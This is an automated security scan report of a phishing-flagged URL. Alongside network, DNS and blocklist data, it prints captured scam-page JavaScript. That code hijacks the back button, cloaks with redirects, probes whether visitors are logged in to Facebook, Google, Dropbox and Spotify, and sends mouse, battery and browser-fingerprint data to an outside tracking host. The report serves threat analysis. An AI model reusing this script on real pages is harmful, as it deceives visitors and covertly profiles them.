Overview

URL dratingmaject.com/9f961cb1-cf52-4303-9131-56622bd15a1c
IP 18.195.149.11
ASN AMAZON-02
Location Germany
Report completed 2022-09-03 02:55:25 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-03 2 dratingmaject.com/9f961cb1-cf52-4303-9131-56622bd15a1c Phishing
2022-09-03 2 novidash.com/smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35 (...) Phishing
2022-09-03 2 novidash.com/smartlink-css/6312c212994913464d155879 Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

URL novidash.com/smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35 (...)
IP  188.240.52.20
Magic gzip compressed data, max compression\012- data
Size 20006
MD5 56f5d7f608e25d64207135f045f988cb
SHA1 901eb59372ae330ae85e1384da93479b21ae1082
SHA256 1910daea79e5a9d04829a91e432dfa56f45a80a3e14a8cf667fec73af9fd3d29
Analyzer Analysed Verdict Comment
VirusTotal 2022-06-17 23:01:02 0/56


Passive DNS (27)

Passive DNS Source Fully Qualified Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS ocsp.sca1b.amazontrust.com (2) 1015 2017-03-03 15:20:51 UTC 2019-03-27 04:05:54 UTC 143.204.42.165
mnemonic passive DNS 0ee06.trknovi.com (3) 0 2022-08-12 16:04:54 UTC 2022-09-02 17:54:25 UTC 188.240.52.20 Unknown ranking
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-02 04:47:06 UTC 143.204.55.110
mnemonic passive DNS other.landerhd.com (6) 0 2022-06-20 15:26:20 UTC 2022-09-02 05:55:16 UTC 188.240.52.20 Unknown ranking
mnemonic passive DNS www.googletagmanager.com (1) 75 2012-12-25 14:52:06 UTC 2022-09-02 04:27:16 UTC 142.250.74.72
mnemonic passive DNS botd.fpapi.io (1) 297160 2021-06-11 10:56:14 UTC 2022-09-02 16:15:15 UTC 18.215.75.60
mnemonic passive DNS in.hotjar.com (1) 1746 2018-10-22 17:15:59 UTC 2022-09-02 04:30:43 UTC 34.251.112.219
mnemonic passive DNS www.spotify.com (1) 1130 2012-06-20 18:23:09 UTC 2022-09-02 12:11:07 UTC 35.186.224.25
mnemonic passive DNS r3.o.lencr.org (5) 344 2020-12-02 08:52:13 UTC 2022-09-02 04:26:06 UTC 23.36.77.32
mnemonic passive DNS ocsp.digicert.com (6) 86 2012-05-21 07:02:23 UTC 2022-09-02 23:15:48 UTC 93.184.220.29
mnemonic passive DNS dratingmaject.com (1) 821761 2021-08-30 08:46:03 UTC 2022-09-02 05:00:10 UTC 18.195.149.11
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2017-09-01 03:40:57 UTC 2022-09-02 09:29:12 UTC 34.120.237.76
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-09-02 20:19:28 UTC 143.204.55.115
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-02 04:27:28 UTC 34.117.237.239
mnemonic passive DNS use.fontawesome.com (2) 942 2017-01-30 04:43:25 UTC 2022-09-02 04:42:55 UTC 172.67.169.247
mnemonic passive DNS stats.g.doubleclick.net (1) 96 2013-06-02 22:47:44 UTC 2022-09-02 04:27:16 UTC 173.194.221.155
mnemonic passive DNS www.facebook.com (1) 99 2017-01-30 05:00:00 UTC 2022-09-02 04:26:55 UTC 31.13.72.36
mnemonic passive DNS novidash.com (5) 35171 2021-06-24 09:21:46 UTC 2022-09-02 21:54:09 UTC 188.240.52.20
mnemonic passive DNS static.hotjar.com (1) 641 2014-11-01 05:14:27 UTC 2022-09-02 04:30:43 UTC 54.230.111.113
mnemonic passive DNS ocsp.pki.goog (6) 175 2017-06-14 07:23:31 UTC 2022-09-02 04:25:33 UTC 142.250.74.3
mnemonic passive DNS vars.hotjar.com (1) 1014 2020-11-05 10:13:14 UTC 2022-09-02 12:20:33 UTC 143.204.55.118
mnemonic passive DNS cdn.jsdelivr.net (2) 439 2012-09-30 00:15:09 UTC 2022-09-02 04:30:45 UTC 151.101.85.229
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-02 04:36:08 UTC 34.214.110.180
mnemonic passive DNS accounts.google.com (3) 81 2016-09-05 09:39:47 UTC 2022-09-02 22:11:24 UTC 216.58.207.237
mnemonic passive DNS www.dropbox.com (1) 1994 2012-05-21 20:31:28 UTC 2022-09-02 11:50:55 UTC 162.125.71.18
mnemonic passive DNS accounts.spotify.com (1) 9553 2014-10-31 13:36:06 UTC 2022-09-03 01:54:33 UTC 35.186.224.25
mnemonic passive DNS ocsp.globalsign.com (1) 2075 2012-05-25 06:20:55 UTC 2022-09-02 05:04:26 UTC 104.18.21.226


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 18.195.149.11

Date UQ / IDS / BL URL IP
2022-11-30 02:00:19 +0000 0 - 0 - 1 dratingmaject.com/573ca57e-93c1-46c3-a4c2-fdf (...) 18.195.149.11
2022-11-29 22:23:25 +0000 0 - 0 - 2 dratingmaject.com/be592a9a-8b96-44a8-9a10-609 (...) 18.195.149.11
2022-11-29 19:15:03 +0000 0 - 0 - 2 dratingmaject.com/ad284c8c-8f8f-4908-83a3-658 (...) 18.195.149.11
2022-11-29 18:31:04 +0000 0 - 0 - 2 dratingmaject.com/8052cc7c-d65b-4b90-9f56-799 (...) 18.195.149.11
2022-11-29 15:30:48 +0000 0 - 0 - 2 dratingmaject.com/01838c12-23c8-4ff9-97e4-6b9 (...) 18.195.149.11

Last 5 reports on ASN: AMAZON-02

Date UQ / IDS / BL URL IP
2022-11-30 03:09:14 +0000 0 - 0 - 2 dtioykqj1u8de.cloudfront.net/prime/ref=nav_to (...) 54.230.218.214
2022-11-30 03:09:08 +0000 0 - 0 - 2 www.e-serviceparts.info/landingpages/cd6304a0 (...) 52.48.119.142
2022-11-30 03:07:07 +0000 0 - 0 - 10 www.your-prize.click/push/iPhone14/index.html (...) 54.230.111.123
2022-11-30 03:07:05 +0000 0 - 0 - 1 greatermediaphiladelphia.com/.WellsVerify/con (...) 3.18.7.81
2022-11-30 03:05:39 +0000 0 - 0 - 4 ww25.amidiscord.xyz/ 199.59.243.222

Last 5 reports on domain: dratingmaject.com

Date UQ / IDS / BL URL IP
2022-11-30 02:00:19 +0000 0 - 0 - 1 dratingmaject.com/573ca57e-93c1-46c3-a4c2-fdf (...) 18.195.149.11
2022-11-29 22:23:25 +0000 0 - 0 - 2 dratingmaject.com/be592a9a-8b96-44a8-9a10-609 (...) 18.195.149.11
2022-11-29 19:15:03 +0000 0 - 0 - 2 dratingmaject.com/ad284c8c-8f8f-4908-83a3-658 (...) 18.195.149.11
2022-11-29 18:31:04 +0000 0 - 0 - 2 dratingmaject.com/8052cc7c-d65b-4b90-9f56-799 (...) 18.195.149.11
2022-11-29 15:30:48 +0000 0 - 0 - 2 dratingmaject.com/01838c12-23c8-4ff9-97e4-6b9 (...) 18.195.149.11

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-08 08:17:00 +0000 0 - 0 - 3 other.landerhd.com/924553162 188.240.52.20
2022-11-07 17:56:04 +0000 0 - 0 - 2 other.landerhq.com/924349113 188.240.52.20
2022-11-06 20:55:27 +0000 0 - 0 - 2 other.landerhd.com/923950036 188.240.52.20
2022-11-06 06:01:38 +0000 0 - 0 - 2 other.landerhd.com/923686280 188.240.52.20
2022-11-04 22:52:13 +0000 0 - 0 - 3 other.landerhd.com/923242532 188.240.52.20


JavaScript

Executed Scripts (12)


Executed Evals (2)

#1 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 3d42eee9415522f4e95fcea0cc832841777e9c595370e8a64ddd028a43a6a903

if (window.location.hostname != "other.landerhd.com") {
    window.location.replace("http://novidash.com/smartlink?user_id=3&source_type=cloak&media_type=other&vertical=other")
}

function onMouseOut(event) {
    if (event.clientY < 50 && event.relatedTarget == null && event.target.nodeName.toLowerCase() !== "select") {
        document.removeEventListener("mouseout", onMouseOut);
        document.getElementById("popup").style.display = "block"
    }
}
document.addEventListener("mouseout", onMouseOut);

function hide(target) {
    document.getElementById(target).style.display = "none"
}
                                    

#2 JavaScript::Eval (size: 5798, repeated: 1) - SHA256: b76f8c8891ef6ba18c376c010c83db67db39ab9eb1f85aa450c7cd0d01d94172

var back_url = "http://novidash.com/smartlink?user_id=1379&source_type=back&media_type=mainstream&vertical=other&click_id=wumnpcku2gu4m2pii7rf3oas&traffic_source_id=0&tracker_id=0&is_rtb_campaign=0&creative_id=290720&from_id=899637196";
var visit_id = "899637196";
var mongo_id = "6312c212994913464d155879";
var domain = "https://novidash.com";
if (typeof domain === 'undefined') {
    var domain = "https://novidash.com"
}! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#');
        onpopstate = function(event) {
            event.state && location.replace(back_url)
        }
    } catch (o) {
        console.log(o)
    }
}();
const div = document.createElement('div');
div.style = "display:none";
div.innerHTML = '<a href="' + domain + '/click/' + visit_id + '?hp">Continue</a>' + '<form action="' + domain + '/click/' + visit_id + '?hp" method="GET">' + '<input type="text" name="email" />' + '<input type="submit" />' + '</form>';
document.body.insertBefore(div, document.body.firstChild);

function activityWatcher() {
    var active = 0;

    function activity() {
        if (active == 0 && visit_id) {
            var xhttp = new XMLHttpRequest();
            xhttp.open("GET", domain + "/landing-interaction/" + visit_id, true);
            xhttp.send()
        }
        active = 1
    }
    var activityEvents = ['mousedown', 'mousemove', 'keydown', 'scroll', 'touchstart'];
    activityEvents.forEach(function(eventName) {
        document.addEventListener(eventName, activity, true)
    })
}
activityWatcher();
var leakSocialMediaAccounts = function(callback) {
    var platforms = [{
        domain: "https://www.facebook.com",
        redirect: "/login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp",
        name: "Facebook"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=en&service=mail",
        name: "Gmail"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&uilel=3&hl=en&service=youtube",
        name: "Youtube"
    }, {
        domain: "https://www.dropbox.com",
        redirect: "/login?cont=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fimages%2Ficons%2Ficon_spacer-vflN3BYt2.gif",
        name: "Dropbox"
    }, {
        domain: "https://www.spotify.com",
        redirect: "/de/login/?forward_url=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico",
        name: "Spotify"
    }];
    platforms.forEach(function(network) {
        var img = document.createElement('img');
        img.referrerPolicy = 'no-referrer';
        img.src = network.domain + network.redirect;
        img.onload = function() {
            callback(network, true)
        };
        img.onerror = function() {
            callback(network, false)
        }
    })
};

function displayResult(network, loggedIn) {
    if (loggedIn == true) {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?social_account=" + network.name, true);
        xhttp.send()
    }
}
leakSocialMediaAccounts(displayResult);
var mousePos;
var previousPos;
var mouseLog = [];
var mouseClickLog = [];
var mouseMovements = 0;
var mouseDistinctMovements = 0;
var mouseDistance = 0;
var mouseClicks = 0;
var mouseActive = 0;
var mouseActivePercentage = 0;
var mouseSpeed = 0;
var mouseSpeedTotal = 0;
var mouseTime = 0;
(function() {
    document.onmousemove = handleMouseMove;
    setInterval(getMousePosition, 500);

    function handleMouseMove(event) {
        var dot, eventDoc, doc, body, pageX, pageY;
        event = event || window.event;
        if (event.pageX == null && event.clientX != null) {
            eventDoc = (event.target && event.target.ownerDocument) || document;
            doc = eventDoc.documentElement;
            body = eventDoc.body;
            event.pageX = event.clientX + (doc && doc.scrollLeft || body && body.scrollLeft || 0) - (doc && doc.clientLeft || body && body.clientLeft || 0);
            event.pageY = event.clientY + (doc && doc.scrollTop || body && body.scrollTop || 0) - (doc && doc.clientTop || body && body.clientTop || 0)
        }
        mousePos = {
            x: event.pageX,
            y: event.pageY
        }
    }
    document.onclick = handleMouseClick;

    function handleMouseClick(event) {
        mouseClicks++
    }

    function getMousePosition() {
        var pos = mousePos;
        if (!pos) {} else {
            if (pos != previousPos) {
                if (mouseLog.indexOf(pos.x + "x" + pos.y) == -1) {
                    mouseDistinctMovements++
                }
                mouseLog.push(pos.x + "x" + pos.y);
                mouseMovements++;
                mouseActive += 0.5;
                if (previousPos) {
                    xDiff = Math.abs(pos.x - previousPos.x);
                    yDiff = Math.abs(pos.y - previousPos.y);
                    mouseDistance += xDiff + yDiff;
                    mouseSpeedTotal += ((xDiff + yDiff) / 0.5) * 2;
                    mouseSpeed = Math.round(mouseSpeedTotal / mouseMovements)
                }
            }
        }
        mouseTime += 0.5;
        mouseActivePercentage = (mouseActive / mouseTime) * 100;
        previousPos = pos
    }
})();
var secsOnPage = 0;
var pingInterval = 1;
setTimeout(function trun() {
    secsOnPage += pingInterval;
    if ((secsOnPage < 60 && secsOnPage % 1 == 0) || (secsOnPage % 50 == 0)) {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?sop=" + secsOnPage + "&mouse_movements=" + mouseMovements + "&mouse_distance=" + mouseDistance + "&mouse_clicks=" + mouseClicks + "&mouse_active=" + mouseActivePercentage + "&mouse_speed=" + mouseSpeed, true);
        xhttp.send()
    }
    if (secsOnPage <= 300) setTimeout(trun, pingInterval * 1000)
}, pingInterval * 1000);
if ('getBattery' in navigator) {
    navigator.getBattery().then((battery) => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?battery_charging=" + battery.charging + "&battery_chargingTime=" + battery.chargingTime + "&battery_dischargingTime=" + battery.dischargingTime + "&battery_level=" + battery.level, true);
        xhttp.send()
    })
}

function initFingerprintJS() {
    const fpPromise = FingerprintJS.load();
    fpPromise.then(fp => fp.get()).then(result => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("POST", domain + "/smartlink-css/" + mongo_id + "?fingerprintid=" + result.visitorId, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("_token={{ csrf_token() }}&fingerprintjs=" + JSON.stringify(result.components))
    }).catch(error => console.error(error))
}

function initBotd() {
    const botdPromise = Botd.load({
        token: "HtazsqGCe7nkVaIHchA",
        mode: "allData"
    });
    botdPromise.then(botd => botd.detect()).then(result => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("POST", domain + "/smartlink-css/" + mongo_id, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("_token={{ csrf_token() }}&fingerprintbot=" + JSON.stringify(result))
    }).catch(error => console.error(error))
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 14, repeated: 1) - SHA256: d3de569b7c2f7f122fba8046d966cd109673d0c87ac58412c3d64f2b2a4c0649

September 2022
                                    


HTTP Transactions (62)


Request Response
                                        
                                            GET /9f961cb1-cf52-4303-9131-56622bd15a1c HTTP/1.1 
Host: dratingmaject.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         18.195.149.11
HTTP/1.1 302
                                        
Server: nginx
Date: Sat, 03 Sep 2022 02:55:13 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://0ee06.trknovi.com/smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61
Pragma: no-cache
Set-Cookie: 9f961cb1-cf52-4303-9131-56622bd15a1c-v4=opaOZmZ8k1l3t50SkyRFVd9CxaOw9BwHFKDjAiT7T6Y; Max-Age=86400; Expires=Sun, 04-Sep-2022 02:55:13 GMT; Domain=dratingmaject.com; Path=/; HttpOnly cc-v4=6ts2yeMIv%2FK4uTaoYtlvfA48Wx%2BmM6ZtdwvdlGr%2FyH4pCrZAYMTtsVYItwZISADEEz6ixcHhjubzz4Ou9ItkDimgpCWMyddAyr%2F0f69XDGVzNhvoBbQ%2F8NQQuTAH9r2YOfin5U1WRuaBgBSmLNhcWg%3D%3D; Max-Age=31536000; Expires=Sun, 03-Sep-2023 02:55:13 GMT; Domain=dratingmaject.com; Path=/; HttpOnly


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Sat, 03 Sep 2022 02:42:45 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 4f01f770085624552bc30a98954f963a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 1GQKwGEct93PclHmLyThED4ZDJMTLACeGVqmpn6oyNq3pKNnDbgz_A==
Age: 749


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "9B43EC48B16F96449208A0094C4D660806A2A2D344B5862DBFF4C393BF3F9F9F"
Last-Modified: Thu, 01 Sep 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14493
Expires: Sat, 03 Sep 2022 06:56:47 GMT
Date: Sat, 03 Sep 2022 02:55:14 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.110
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Sat, 03 Sep 2022 01:15:18 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 a9120cc3ff449047c990e82a4d5566ba.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: dx5NzQdL8yfsY61L3oC6hTuEsp5nSgVBYz3Pr4D6q_9jecs1liw27g==
age: 5997
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Sat, 03 Sep 2022 02:55:14 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, ETag, Backoff, Last-Modified, Pragma, Cache-Control, Expires, Content-Type, Content-Length, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Sat, 03 Sep 2022 02:38:17 GMT
Cache-Control: max-age=3600
Expires: Sat, 03 Sep 2022 03:29:34 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 dac7cf040932e0c072eeed10afdd7b3e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: RcPznDIQp88azK2DmhrlFYpZhI9TqHzO6W5G1Mjw3i_KBKFE-FPCtQ==
Age: 1018


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /npm/@fingerprintjs/fingerprintjs@3/dist/fp.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=604800, s-maxage=43200
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 3.3.5
x-jsd-version-type: version
etag: W/"8392-Rfi4DUKsZmgOw+7TcNmFhcx8ixc"
content-encoding: gzip
accept-ranges: bytes
date: Sat, 03 Sep 2022 02:55:15 GMT
age: 6712
x-served-by: cache-fra19145-FRA, cache-bma1648-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
content-length: 14137
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (33348)
Size:   14137
Md5:    e7b94e944315bb48c9b9820ad324718d
Sha1:   f77317565b6243287bd3ee74fe96a9632fef559a
Sha256: 4c8e188a605e3090b34c87622bf7038d6699cb06af2f242eb77843ff3966f97a
                                        
                                            GET /landingpages/mcafee/os_versions.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 3073
last-modified: Wed, 31 Aug 2022 12:57:34 GMT
etag: "630f5abe-c01"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 135 x 26, 8-bit/color RGBA, interlaced\012- data
Size:   3073
Md5:    e662ac219b9626c6488250a2b09640c5
Sha1:   45636878adece610ed4d2c44bb177ac53e68adfb
Sha256: cb28be8a2c6c7ef36afd59c211b5a1f50ad26229c14ae714c39df687c96ab823
                                        
                                            GET /npm/@fpjs-incubator/botd-agent@0/dist/botd.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=604800, s-maxage=43200
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 0.1.20
x-jsd-version-type: version
etag: W/"2349-ZoOIlhfcFugXpJwXzjjzWO/fFjg"
content-encoding: gzip
accept-ranges: bytes
date: Sat, 03 Sep 2022 02:55:15 GMT
age: 20303
x-served-by: cache-fra19148-FRA, cache-bma1648-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
content-length: 3067
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (8836)
Size:   3067
Md5:    b066530dd980f68abf6d92414bc4c7ed
Sha1:   34ad41df121cf682a0471d60e19ca4590fb5314f
Sha256: b494f22ff0e7d3f34e58eed4232718aec04e61857777fff1bee495f488a52084
                                        
